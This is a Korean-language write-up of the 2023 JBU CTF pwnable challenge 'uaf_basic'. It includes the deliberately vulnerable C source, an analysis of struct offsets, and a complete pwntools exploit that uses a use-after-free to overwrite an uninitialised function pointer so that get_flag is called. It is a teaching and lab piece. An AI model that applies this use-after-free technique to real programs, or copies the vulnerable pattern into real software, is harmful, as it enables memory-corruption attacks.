[2023 JBU CTF] uaf_basic write-up

분야 : Pwnable

💡 2023 JBU CTF에서 출제한 문제에 대한 write-up이다.

🧐 문제

문제명 : uaf_basic

Use After Free 기법을 이해하고, 이를 통해 함수를 호출하여 플래그를 얻는 문제이다.

 

 

위 구성이 문제파일로 제공된다. 로컬에서 도커 컨테이너를 올려 익스플로잇을 진행하고, 동일한 페이로드를 서버에 전송하면 플래그를 획득할 수 있다. 해당 문제는 구조체의 이해를 위해 C 소스파일을 제공한다.

 

🧐 정적 분석

보호 기법은 위와 같다. 문제에서 주어진 C 소스파일을 분석해보자.

 

uaf_basic.c

// Name: uaf_basic.c
// Compile: gcc -o uaf_basic uaf_basic.c -no-pie
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

struct Student
{
  char name[16];
  int id;
  long grade;
  long age;
} __attribute__((packed)) Student;

struct Professor
{
  char name[16];
  int id;
  long age;
} __attribute__((packed)) Professor;

struct Lecture
{
  char name[22];
  int id;
  void (*enrolment)();
} __attribute__((packed)) Lecture;

struct Student *student;
struct Professor *professor;
struct Lecture *lecture;

void get_flag()
{
  FILE *f = fopen("/home/uaf/flag", "r");
  char buf[256];
  if (f == NULL)
  {
    puts("flag.txt not found - call SCP member\n");
    exit(0);
  }
  else
  {
    fgets(buf, sizeof(buf), f);
    printf("%s\n", buf);
    exit(0);
  }
}

void menu()
{
  printf("1. Student\n");
  printf("2. Professor\n");
  printf("3. Lecture\n");
  printf("> ");
}

void student_func()
{
  student = (struct Student *)malloc(sizeof(struct Student));
  strcpy(student->name, "Student");
  printf("Student ID: ");
  scanf("%d", &student->id);
  printf("Student Grade: ");
  scanf("%ld", &student->grade);
  if (student->grade < 1 || student->grade > 4)
  {
    printf("grade must be between 1 and 4\n");
    exit(0);
  }
  printf("Student Age: ");
  scanf("%ld", &student->age);
  free(student);
}

void professor_func()
{
  professor = (struct Professor *)malloc(sizeof(struct Professor));
  strcpy(professor->name, "Professor");
  printf("Professor ID: ");
  scanf("%d", &professor->id);
  printf("Professor Age: ");
  scanf("%ld", &professor->age);
  free(professor);
}

void lecture_func()
{
  lecture = (struct Lecture *)malloc(sizeof(struct Lecture));
  strcpy(lecture->name, "Lecture");
  printf("Lecture ID: ");
  scanf("%d", &lecture->id);
  if (lecture->enrolment)
    lecture->enrolment();
  free(lecture);
}

int main()
{
  int idx;
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  while (1)
  {
    menu();
    scanf("%d", &idx);
    switch (idx)
    {
    case 1:
      student_func();
      break;
    case 2:
      professor_func();
      break;
    case 3:
      lecture_func();
      break;
    }
  }
}

main함수에서 각 메뉴에 해당하는 함수를 호출할 수 있다.

 

🧐 함수 분석

menu 1 : student_func

menu 2 : professor_func

menu 3 : lecture_func

함수 모두 각각 malloc으로 할당하고 각 멤버 변수에 값을 입력받고, 함수 마지막에서 free된다.

하지만 lecture->enrolment의 경우 입력을 받지 않고, 값이 존재한다면 해당 주소를 호출한다.

따라서, UAF 취약점을 이용하여 lecture->enrolment에 get_flag함수 주소를 넣으면 플래그를 얻을 수 있다.

 

🧐 구조체 분석

struct Student{
  char name[16];
  int id;
  long grade;
  long age; //Lecture + 30
} __attribute__((packed)) Student;

struct Professor{
  char name[16];
  int id;
  long age; //Lecture + 26
} __attribute__((packed)) Professor;

struct Lecture{
  char name[22];
  int id;
  void (*enrolment)();
} __attribute__((packed)) Lecture;

그렇다면 구조체 별로 크기를 확인해야 한다. 우리가 사용할 공간은 lecture->enrolment이고, 해당 부분의 시작 주소는 lecture+26이다.

이 값을 Student와 Professor에서 동일한 메모리 주소를 할당 받아 설정해줄 것이다.

student+26은 student→grade와 student→age와 4바이트씩 나누어서 들어간다.

따라서 각 멤버 변수는 정수를 입력받기 때문에, 이 값을 계산해서 4바이트만큼 메모리를 구성해주면 된다.

 

if (student->grade < 1 || student->grade > 4)
  {
    printf("grade must be between 1 and 4\n");
    exit(0);
  }

하지만, student→grade는 1~4의 값만 넣을 수 있기 때문에, lecture+30부터 lecture+33의 주소만 UAF 취약점으로 남겨둘 수 있다.

lecture+25부터 lecture+29는 professor+25공간인 professor→age에서 UAF 취약점으로 남겨둘 수 있다.

따라서, student_func() → professor_func() → lecture_func() 순서로 값을 잘 설정하여 get_flag함수를 호출할 수 있다.

 

🧐 동적 분석

💡 힙 영역이기 때문에, 해당 chunk의 data 값을 보기위해 `+16`을 했다.

1. 호출할 함수 주소 확인

우리가 호출할 함수는 get_flag이고, 시작 주소는 0x401236이다.

 

2. student_func()로 Lecture+30 ~ Lecture+33 메모리 쓰기

 

3. professor_func()로 Lecture+26 ~ Lecture+29 메모리 쓰기

 

4. lecture_func()로 Lecture→enrolment 주소 확인

 

🧐 익스플로잇

from pwn import *
import warnings
warnings.filterwarnings("ignore", category=BytesWarning)

def student_func(id, grade, age):
    p.sendlineafter(b'> ', str(1))
    p.sendlineafter(b'Student ID: ', str(id))
    p.sendlineafter(b'Student Grade: ', str(grade))
    p.sendlineafter(b'Student Age: ', str(age))

def professor_func(id, age):
    p.sendlineafter(b'> ', str(2))
    p.sendlineafter(b'Professor ID: ', str(id))
    p.sendlineafter(b'Professor Age: ', str(age))

def lecture_fun(id):
    p.sendlineafter(b'> ', str(3))
    p.sendlineafter(b'Lecture ID: ', str(id))

#p = process('./uaf_basic')
e = ELF('./uaf_basic')
p = remote('192.168.83.137', 13577)

get_flag = e.sym['get_flag']
get_flag1 = (get_flag & 0xffff)<<48
get_flag2 = (get_flag & 0xffff0000)>>16

log.info('\tget_flag :'+ hex(get_flag))
log.info('\tage_flag1 :'+ hex(get_flag1))
log.info('\tget_flag2 :'+ hex(get_flag2))

student_func(2, 4, get_flag2)
professor_func(6, get_flag1)
lecture_fun(1234)

#gdb.attach(p)
#pause()

p.interactive()

해당 exploit 코드를 실행하면 플래그를 얻을 수 있다.